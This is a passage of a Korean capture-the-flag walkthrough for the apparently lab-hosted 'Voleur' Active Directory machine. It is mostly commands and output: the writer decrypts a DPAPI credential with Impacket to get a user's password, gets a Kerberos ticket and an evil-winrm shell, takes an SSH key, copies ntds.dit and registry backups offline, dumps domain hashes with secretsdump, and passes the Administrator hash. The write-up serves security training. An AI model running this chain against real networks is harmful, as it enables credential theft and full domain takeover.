dlyaQgs0YW7H5gWzc92ZrcTK1TXBO6ln7meBvmkT1RuqEZHHTpfWoKJFHs=
PS C:\IT\Second-Line Support\Archived Users\todd.wolfe\AppData\Roaming\Microsoft\Credentials> [Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\772275FAD58525253490A9B0039791D3"))
[Convert]::ToBase64String([IO.File]::ReadAllBytes("$PWD\772275FAD58525253490A9B0039791D3"))
AQAAAIIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAgpOUCE8TY0y5PM5S78CqiAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAAFHzKgn3YLCvJj2rEPIQnU0AAAAABIAAAKAAAAAQAAAAQ5Eg3TZk1WowkapUa9UM/8AAAABPVx6LdEsEI0F7djLz0Hln/QVDHquvAyiJU8l7uAu9Lyz7xRKASqN6wciIci6VUdYEoKCYs0WZrs0QDAcwBzCNLLBuJd8XmtwjUg3CJ8qPoP6iWvn2iuNWY4f0DyFyLVvJ99Y+oDnMOwRWZVbuALaPzH7dalRoH/Bfcp2mHYwHF49CPkhEcBkUdWc8EDapERM1oko6oGxKhX+vSiB5CMRhhWHIQI0Zso+/ynQrQe/Og3R1pZjBZQtugVQOqAcnf5cUAAAAIVzGEtY4B9mi4fsWOVfrBp0oItY=
└─$ echo 'AQAAAIIBAAAAAAAAAQAAANCMnd8BFdERjHoAwE/Cl+sBAAAAgpOUCE8TY0y5PM5S78CqiAAAACA6AAAARQBuAHQAZQByAHAAcgBpAHMAZQAgAEMAcgBlAGQAZQBuAHQAaQBhAGwAIABEAGEAdABhAA0ACgAAAANmAADAAAAAEAAAAFHzKgn3YLCvJj2rEPIQnU0AAAAABIAAAKAAAAAQAAAAQ5Eg3TZk1WowkapUa9UM/8AAAABPVx6LdEsEI0F7djLz0Hln/QVDHquvAyiJU8l7uAu9Lyz7xRKASqN6wciIci6VUdYEoKCYs0WZrs0QDAcwBzCNLLBuJd8XmtwjUg3CJ8qPoP6iWvn2iuNWY4f0DyFyLVvJ99Y+oDnMOwRWZVbuALaPzH7dalRoH/Bfcp2mHYwHF49CPkhEcBkUdWc8EDapERM1oko6oGxKhX+vSiB5CMRhhWHIQI0Zso+/ynQrQe/Og3R1pZjBZQtugVQOqAcnf5cUAAAAIVzGEtY4B9mi4fsWOVfrBp0oItY=' | base64 -d > cred.bin
└─$ echo 'AgAAAAAAAAAAAAAAMAA4ADkANAA5ADMAOAAyAC0AMQAzADQAZgAtADQAYwA2ADMALQBiADkAMwBjAC0AYwBlADUAMgBlAGYAYwAwAGEAYQA4ADgAAAAAAAAAAAAAAAAAiAAAAAAAAABoAAAAAAAAAAAAAAAAAAAAdAEAAAAAAAACAAAASAWcret5vHz2ZFDJGrnZI1BGAAAJgAAAA2YAAANcj1B/jylUhNcSe+UibSS+B7/bdiHKg/fYSD6cibplaMd3Y4zsjKqsVTKcNtLlcdFUHq1DuFNs3RIWP+bmweMuDU8cufImoeLTlQpIYdMh+W9gPmEl8K4uE7aQE3Yw5XcATlxytrmIAgAAAB7vnBVPlWNLbxgEAtZNEf5QRgAACYAAAANmAABK1OOpu3KshUr3dLNdcY8yUp0/QCvW9RyADda8JEaf/e2Qbn8XnQuQPb/7LENveEXSO4R2DsxXLXCs4ban1JazinCCqkvrWW0CAAAAAAEAAFgAAACEizqYyco/TqsQ3rgf7i9DSOaEVnONX4KQQG5p9lFlW0/lt1Tnj0do7kUF1rtUFAHLJCLhNsUpKRlyquQSSM0FnaIPoACBXWAUQ8P1KLfVosXGHH5zx9BwP8S+SjguDL3ipMNTWgTbAxzMB6wei02C/GjW4TTqZz6d/ENfJi79Quwp48np4xmtDOMKfNBKdPGdHIBSeJBJ90SpBN/sFHoveguRpfGmcJVpE4P/2yZWHcHSlTXxx1bF2GR/N32eLVzlDW8U0jiqZXz+GAxZPJcXVZzcwJCnQ86b5WV9YBrXq3d5gyGPGWgx3cryZPMR+03CQtT41lxN4CfgfD59crbmN5sMZCp6KG5RyRs3J1k0BXwLy8Ri33WwYhOUCCi9pSj1y3vvwqmAV4v1UydH0PXPlH+39e2oB2487UTGGdlyaQgs0YW7H5gWzc92ZrcTK1TXBO6ln7meBvmkT1RuqEZHHTpfWoKJFHs=' | base64 -d > masterkey.bin
└─$ impacket-dpapi masterkey -file masterkey.bin -sid S-1-5-21-3927696377-1337352550-2781715495-1110 -password 'NightT1meP1dg3on14'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[MASTERKEYFILE]
Version : 2 (2)
Guid : 08949382-134f-4c63-b93c-ce52efc0aa88
Flags : 0 (0)
Policy : 0 (0)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)
Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
└─$ impacket-dpapi credential -file cred.bin -key 0xd2832547d1d5e0a01ef271ede2d299248d1cb0320061fd5355fea2907f9cf879d10c9f329c77c4fd0b9bf83a9e240ce2b8a9dfb92a0d15969ccae6f550650a83
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[CREDENTIAL]
LastWritten : 2025-01-29 12:55:19+00:00
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=Jezzas_Account
Description :
Unknown :
Username : jeremy.combs
Unknown : qT3V9pLXyN7W4m
jeremy.combs:qT3V9pLXyN7W4m 계정 정보를 획득했습니다.
└─$ impacket-getTGT voleur.htb/jeremy.combs:'qT3V9pLXyN7W4m' -dc-ip 10.129.232.130
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in jeremy.combs.ccache
└─$ export KRB5CCNAME=jeremy.combs.ccache
└─$ evil-winrm -i DC.voleur.htb -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\jeremy.combs\Documents> whoami
voleur\jeremy.combs
권한 상승
앞서 본것 처럼 jeremy.combs 계정은 Third-Line Support 그룹에 속해있습니다.
*Evil-WinRM* PS C:\IT\Third-Line Support> dir
Directory: C:\IT\Third-Line Support
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 1/30/2025 8:11 AM Backups
-a---- 1/30/2025 8:10 AM 2602 id_rsa
-a---- 1/30/2025 8:07 AM 186 Note.txt.txt
*Evil-WinRM* PS C:\IT\Third-Line Support> cat Note.txt.txt
Jeremy,
I've had enough of Windows Backup! I've part configured WSL to see if we can utilize any of the backup tools from Linux.
Please see what you can set up.
Thanks,
Admin
*Evil-WinRM* PS C:\IT\Third-Line Support> download id_rsa
Info: Downloading C:\IT\Third-Line Support\id_rsa to id_rsa
Info: Download successful!
이후 권한 부여한 뒤, 이전에 봤던 2222번 포트로 연결을 시도합니다.
└─$ ssh -i id_rsa svc_backup@voleur.htb -p 2222
The authenticity of host '[voleur.htb]:2222 ([10.129.232.130]:2222)' can't be established.
ED25519 key fingerprint is: SHA256:mKWAEwLTnEN2bJNi7fkc+BZodiXCIiP3ywSLJiZL0ss
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[voleur.htb]:2222' (ED25519) to the list of known hosts.
Welcome to Ubuntu 20.04 LTS (GNU/Linux 4.4.0-20348-Microsoft x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Jan 2 16:24:31 PST 2026
System load: 0.52 Processes: 9
Usage of /home: unknown Users logged in: 0
Memory usage: 33% IPv4 address for eth0: 10.129.232.130
Swap usage: 0%
363 updates can be installed immediately.
257 of these updates are security updates.
To see these additional updates run: apt list --upgradable
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Thu Jan 30 04:26:24 2025 from 127.0.0.1
* Starting OpenBSD Secure Shell server sshd [ OK ]
svc_backup@DC:~$ whoami
svc_backup
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ ls -al
total 24592
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 25165824 Jan 30 2025 ntds.dit
-rwxrwxrwx 1 svc_backup svc_backup 16384 Jan 30 2025 ntds.jfm
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/Active Directory$ cd ..
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups$ cd registry/
svc_backup@DC:/mnt/c/IT/Third-Line Support/Backups/registry$ ls -al
total 17952
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 .
drwxrwxrwx 1 svc_backup svc_backup 4096 Jan 30 2025 ..
-rwxrwxrwx 1 svc_backup svc_backup 32768 Jan 30 2025 SECURITY
-rwxrwxrwx 1 svc_backup svc_backup 18350080 Jan 30 2025 SYSTEM
디렉터리 확인 시 NTDS, SYSTEM, SECURITY 세 파일을 확인했고 로컬 머신으로 이동시킵니다. 이 파일들을 통해 오프라인 덤프로 시스템 장악이 가능합니다.
└─$ scp -P 2222 -i id_rsa -r svc_backup@voleur.htb:"/mnt/c/IT/Third-Line Support/Backups" .
ntds.dit 100% 24MB 1.2MB/s 00:19
ntds.jfm 100% 16KB 25.5KB/s 00:00
SECURITY 100% 32KB 51.0KB/s 00:00
SYSTEM 100% 18MB 586.0KB/s 00:30
└─$ impacket-secretsdump -ntds ntds.dit -system SYSTEM local
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xbbdd1a32433b87bcc9b875321b883d2d
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] PEK # 0 found and decrypted: 898238e1ccd2ac0016a18c53f4569f40
[*] Reading and decrypting hashes from ntds.dit
Administrator:500:aad3b435b51404eeaad3b435b51404ee:e656e07c56d831611b577b160b259ad2:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5db085d469e3181935d311b72634d77:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5aeef2c641148f9173d663be744e323c:::
...
[*] Cleaning up...
Shell
└─$ impacket-getTGT voleur.htb/administrator -hashes :e656e07c56d831611b577b160b259ad2
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] Saving ticket in administrator.ccache
└─$ export KRB5CCNAME=administrator.ccache
└─$ evil-winrm -i DC.voleur.htb -r voleur.htb
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
voleur\administrator
Comments
Sign in with GitHub to leave a comment.